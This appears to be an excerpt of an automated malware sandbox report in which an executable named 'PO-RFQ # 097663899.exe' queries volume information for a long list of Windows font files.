          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
